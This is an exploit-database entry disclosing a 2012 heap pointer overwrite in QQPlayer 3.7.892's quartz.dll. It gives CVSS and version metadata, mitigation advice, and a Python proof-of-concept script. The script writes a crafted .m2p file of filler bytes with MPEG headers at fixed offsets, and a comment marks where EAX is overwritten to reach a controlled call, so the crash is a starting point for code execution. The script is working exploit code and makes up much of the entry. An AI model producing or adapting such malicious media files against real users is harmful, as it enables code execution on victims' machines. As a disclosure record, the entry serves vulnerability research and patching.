QQPlayer 3.7.892 m2p quartz.dll heap pointer overwrite PoC

vendor:

QQPlayer

by:

James Ritchey

7,8

CVSS

HIGH

Heap Pointer Overwrite

119

CWE

Product Name: QQPlayer

Affected Version From: 3.7.892

Affected Version To: 3.7.892

Patch Exists: YES

Related CWE: N/A

CPE: a:qq-player:qqplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2012

QQPlayer 3.7.892 m2p quartz.dll heap pointer overwrite PoC

QQPlayer 3.7.892 is vulnerable to a heap pointer overwrite vulnerability. An attacker can craft a malicious .m2p file and send it to the victim. When the victim opens the file, the heap pointer overwrite will occur, allowing the attacker to execute arbitrary code.

Mitigation:

Users should avoid opening untrusted files, and should update to the latest version of QQPlayer.

Source

Exploit-DB raw data:

# Exploit Title: QQPlayer 3.7.892 m2p quartz.dll heap pointer overwrite PoC
# Date: 10/14/2012
# Author: James Ritchey
# Vendor Homepage: www.qq-player.com
# Software Link: http://www.qq-player.com/download_en.php
# Version: 3.7.892
# Tested on: Windows XP SP3


l = 3315716 * "A"
s1 = ((0,'\x00\x00\x01\xba'), (2048, '\x00\x00\x01\xba'),
      (3289120, '\x00\x00\x01\xe0\x07'), (3289273, '\x00\x00\x01\xb3'),
      (3289283, '\xba'), (3289452, '\x42\x42\x42\x42'),
      (3289468, '\x00\x00\x01\x00'), (3290359, '\x00\x00\x01\x00'),
      (3301408, '\x00\x00\x01\xe0\x07'), (3303112, '\x00\x00\x01\x00'))
# EAX overwrite(3289452, '\x42\x42\x42\x42') call eax+0x24

o = open("c:\\poc.m2p","wb")
o.write(l)

for i in range(len(s1)):
    o.seek(s1[i][0], 0)
    o.write(s1[i][1])

o.close()